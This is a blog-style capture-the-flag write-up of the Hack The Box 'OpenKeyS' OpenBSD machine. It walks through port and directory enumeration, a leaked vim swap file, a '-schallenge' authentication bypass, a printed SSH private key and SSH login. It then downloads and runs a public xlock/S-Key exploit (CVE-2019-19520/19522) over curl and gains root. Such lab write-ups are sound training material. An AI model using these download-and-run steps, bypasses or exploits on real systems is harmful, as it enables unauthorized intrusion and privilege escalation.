nihilist's Blog
Previous Page

nihilist - 26 / 06 / 2021

OpenKeyS Writeup

Introduction :



OpenKeyS is an Easy (but marked as Medium) OpenBSD box released back in July 2020.

Part 1 : Initial Enumeration



As always we begin our Enumeration using Nmap to enumerate opened ports.
We will be using the flags -sC for default scripts and -sV to enumerate versions.


[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ nmap -vvv -p- 10.10.10.199 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
Discovered open port 22/tcp on 10.10.10.199
Discovered open port 80/tcp on 10.10.10.199


[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ nmap -sCV -p22,80 10.10.10.199
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-26 21:12 CEST
Nmap scan report for 10.10.10.199
Host is up (0.47s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey:
|   3072 5e:ff:81:e9:1f:9b:f8:9a:25:df:5d:82:1a:dd:7a:81 (RSA)
|   256 64:7a:5a:52:85:c5:6d:d5:4a:6b:a7:1a:9a:8a:b9:bb (ECDSA)
|_  256 12:35:4b:6e:23:09:dc:ea:00:8c:72:20:c7:50:32:f3 (ED25519)
80/tcp open  http    OpenBSD httpd
|_http-title: Site doesn't have a title (text/html).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Part 2 : Getting User Access



Our nmap scan picked up port 80 which is a simple login page:

Let's enumerate the webservice using gobuster:


[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ gobuster dir -q -t 50 -u http://10.10.10.199 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php,txt
/includes             (Status: 301) [Size: 443] [--> http://10.10.10.199/includes/]
/js                   (Status: 301) [Size: 443] [--> http://10.10.10.199/js/]
/css                  (Status: 301) [Size: 443] [--> http://10.10.10.199/css/]
/images               (Status: 301) [Size: 443] [--> http://10.10.10.199/images/]
/index.php            (Status: 200) [Size: 4837]
/fonts                (Status: 301) [Size: 443] [--> http://10.10.10.199/fonts/]
/.                    (Status: 200) [Size: 96]

We found the /includes directory so let's check it from our web browser:

Here we see that we have access to the auth.php.swp file:


[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ wget http://10.10.10.199/includes/auth.php.swp
--2021-06-26 21:20:14--  http://10.10.10.199/includes/auth.php.swp
Connecting to 10.10.10.199:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘auth.php.swp’

auth.php.swp                                                        [   <=>                                                                                                                                                 ]  12.00K  12.8KB/s    in 0.9s

2021-06-26 21:20:16 (12.8 KB/s) - ‘auth.php.swp’ saved [12288]


[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ file auth.php.swp
auth.php.swp: Vim swap file, version 8.1, pid 49850, user jennifer, host openkeys.htb, file /var/www/htdocs/includes/auth.php

[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ cat auth.php.swp
3210#! Utp=adniferopenkeys.htb/var/www/htdocs/includes/auth.php
@sWB@? mgC






v
 p
  n
   m
    U
     S
      0



       J














?>}    session_start();    session_destroy();    session_unset();{function close_session()}    $_SESSION["username"] = $_REQUEST['username'];    $_SESSION["user_agent"] = $_SERVER['HTTP_USER_AGENT'];    $_SESSION["remote_addr"] = $_SERVER['REMOTE_ADDR'];    $_SESSION["last_activity"] = $_SERVER['REQUEST_TIME'];    $_SESSION["login_time"] = $_SERVER['REQUEST_TIME'];    $_SESSION["logged_in"] = True;{function init_session()}    }        return False;    {    else    }        }            return True;            $_SESSION['last_activity'] = $time;            // Session is active, update last activity time and return True        {        else        }            return False;            close_session();        {            ($time - $_SESSION['last_activity']) > $session_timeout)        if (isset($_SESSION['last_activity']) &&         $time = $_SERVER['REQUEST_TIME'];        // Has the session expired?    {    if(isset($_SESSION["logged_in"]))    // Is the user logged in?     session_start();    // Start the session    $session_timeout = 300;    // Session timeout in seconds{function is_active_session()}    return $retcode;    system($cmd, $retcode);    $cmd = escapeshellcmd("../auth_helpers/check_auth " . $username . " " . $password);{function authenticate($username, $password)<?php%

So once we download the .swp file we know that this was used by the user jennifer on openkeys.htb (we add it to our hosts file) and that there was a link to ../auth_helpers/check_auth so we download it after adding openkeys.htb to our hosts file:



[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ sudo -i
[sudo] password for nothing:
┌──(root💀nowhere)-[~]
└─# echo '10.10.10.199 openkeys.htb' >> /etc/hosts

┌──(root💀nowhere)-[~]
└─# ping -c1 openkeys.htb
PING openkeys.htb (10.10.10.199) 56(84) bytes of data.
64 bytes from openkeys.htb (10.10.10.199): icmp_seq=1 ttl=254 time=470 ms

--- openkeys.htb ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 469.674/469.674/469.674/0.000 ms

┌──(root💀nowhere)-[~]
└─# exit


[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ wget http://10.10.10.199/auth_helpers/check_auth
--2021-06-26 21:23:30--  http://10.10.10.199/auth_helpers/check_auth
Connecting to 10.10.10.199:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12288 (12K) [application/octet-stream]
Saving to: ‘check_auth’

check_auth                                                      100%[======================================================================================================================================================>]  12.00K  12.8KB/s    in 0.9s

2021-06-26 21:23:32 (12.8 KB/s) - ‘check_auth’ saved [12288/12288]

We check what kind of file check_auth is:


[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ file check_auth
check_auth: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /usr/libexec/ld.so, for OpenBSD, not stripped

[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ rabin2 -I check_auth
arch     x86
baddr    0x0
binsz    10495
bintype  elf
bits     64
canary   false
retguard false
class    ELF64
compiler Linker: LLD 8.0.1
crypto   false
endian   little
havecode true
intrp    /usr/libexec/ld.so
laddr    0x0
lang     c
linenum  true
lsyms    true
machine  AMD x86-64 architecture
maxopsz  16
minopsz  1
nx       true
os       openbsd
pcalign  0
pic      true
relocs   true
relro    partial
rpath    NONE
sanitiz  false
static   false
stripped false
subsys   openbsd
va       true

So here we see a hint towards /usr/libexec/ld.so and after a bit of googling we would stumble upon an authentication bypass using -schallenge as the password inside the cookie, so intercept the POST request to the index.php login page we found earlier using burpsuite:

Obviously if we send it as it is we get an authentication denied error:

So let's try the authentication bypass by going through the PHP cookie we mentionned earlier:

We follow the redirection:

And we get a SSH key! Now let's save it locally and use it to login as jennifer:


[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ cat pkey
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ chmod 600 pkey

[ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys]
→ ssh -i pkey jennifer@openkeys.htb
The authenticity of host 'openkeys.htb (10.10.10.199)' can't be established.
ECDSA key fingerprint is SHA256:gzhq4BokiWZ1NNWrblA8w3hLOhlhoRy+NFyi2smBZOA.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'openkeys.htb,10.10.10.199' (ECDSA) to the list of known hosts.
Last login: Wed Jun 24 09:31:16 2020 from 10.10.14.2
OpenBSD 6.6 (GENERIC) #353: Sat Oct 12 10:45:56 MDT 2019

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code.  With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.

openkeys$ id
uid=1001(jennifer) gid=1001(jennifer) groups=1001(jennifer), 0(wheel)
openkeys$ ls
user.txt
openkeys$ cat user.txt
36XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

And that's it! We managed to login via SSH as the user jennifer and get the user flag.

Part 3 : Getting Root Access



Now in order to privesc this box let's first enumerate it using linpeas.sh: 


[terminal 1]
[ 10.10.14.11/23 ] [ /dev/pts/0 ] [~/HTB/openkeys]
→ cp /home/nothing/HTB/Admirer/linpeas.sh .

[ 10.10.14.11/23 ] [ /dev/pts/0 ] [~/HTB/openkeys]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...

[terminal 2]
openkeys$ curl http://10.10.14.11:9090/linpeas.sh > /tmp/peas.sh
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  333k  100  333k    0     0  66009      0  0:00:05  0:00:05 --:--:-- 80533
openkeys$ chmod +x /tmp/peas.sh
openkeys$ /tmp/peas.sh

Let linpeas.sh run a bit and scrolling through the output we stumble upon xlock. So that's the hint to lookup for xlock privesc vulnerabilities, and we stumble upon CVE-2019-19520. So we upload the privesc script onto the box:


[terminal 1]
[ 10.10.14.11/23 ] [ /dev/pts/23 ] [~/HTB/openkeys]
→ wget https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot -O exploit.sh

[ 10.10.14.11/23 ] [ /dev/pts/0 ] [~/HTB/openkeys]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...

[terminal 2]
openkeys$ curl http://10.10.14.11:9090/exploit.sh > exploit.sh
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  4087  100  4087    0     0   4315      0 --:--:-- --:--:-- --:--:--  4311
openkeys$ file exploit.sh
exploit.sh: Bourne shell script text executable
openkeys$ chmod +x exploit.sh
openkeys$ ./exploit.sh

openbsd-authroot (CVE-2019-19520 / CVE-2019-19522)
[*] checking system ...
[*] system supports S/Key authentication
[*] id: uid=1001(jennifer) gid=1001(jennifer) groups=1001(jennifer), 0(wheel)
[*] compiling ...
[*] running Xvfb ...
[*] testing for CVE-2019-19520 ...
_XSERVTransmkdir: ERROR: euid != 0,directory /tmp/.X11-unix will not be created.
[+] success! we have auth group permissions

WARNING: THIS EXPLOIT WILL DELETE KEYS. YOU HAVE 5 SECONDS TO CANCEL (CTRL+C).

[*] trying CVE-2019-19522 (S/Key) ...
Your password is: EGG LARD GROW HOG DRAG LAIN
otp-md5 99 obsd91335
S/Key Password: EGG LARD GROW HOG DRAG LAIN

openkeys# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)

openkeys# cat /root/root.txt
f3XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

And that's it! We managed to privesc to the root user and print the root flag.

Conclusion



Here we can see the progress graph :

Nihilism

Until there is Nothing left.

My Links

RSS Feed
Matrix Chat

About nihilist

Donate XMR: 8AUYjhQeG3D5aodJDtqG499N5jXXM71gYKD8LgSsFB9BUV1o7muLv3DXHoydRTK4SZaaUBq4EAUqpZHLrX2VZLH71Jrd9k8


Contact: nihilist@contact.nowhere.moe (PGP)